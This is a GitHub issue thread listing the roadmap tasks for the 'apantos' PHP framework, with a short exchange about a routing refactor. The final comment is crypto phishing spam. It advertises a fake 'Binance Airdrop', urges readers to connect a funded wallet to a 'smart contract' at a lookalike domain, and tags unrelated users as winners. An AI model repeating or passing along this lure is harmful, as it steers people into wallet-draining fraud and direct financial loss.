### ISSUE TITLE
Implementation of Project Roadmap Feature 🗓️

### ISSUE THREAD

**Issue by alishahidi** [alishahidi/apantos#18]
This issue is for implementing the roadmap feature of the project. Below is a list of tasks that need to be completed:

- [ ] Complete documentation
- [x] Refactor routing system
- [ ] Improve template engine
- [ ] Make security system sync and simple
- [ ] Start developing api side
- [ ] Build github pages for project
- [ ] Refactor ORM also using doctrine for it
- [ ] Make auth system more dynamic
- [ ] Create telegram support team for apantos
- [ ] Create cli for manage controllers, models, views, composers and more
- [ ] Packaging system modules for make core updatable
- [ ] Add telegram bot support
- [ ] Add test to apantos
- [ ] Built in faker
- [ ] Improve migrations
- [ ] Create model factory system
- [ ] Fix csrf protection bug

We can discuss the progress of each task in the comments of this issue.

Good luck 😎

**Comment by alishahidi** [comment]
Routing system refactoring done by
 i will test it and merge completely to main release

thanks @ahmadreza1383

**Comment by ahmadreza1383** [comment]
Thank you
I am working on a company project and will join you to optimize apantos as soon as possible

**Comment by alishahidi** [comment]
Ok 👍

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @xioloix, @jie1789, @cheesedart, @goean, @lo-e, @ymcareer, @delatvan
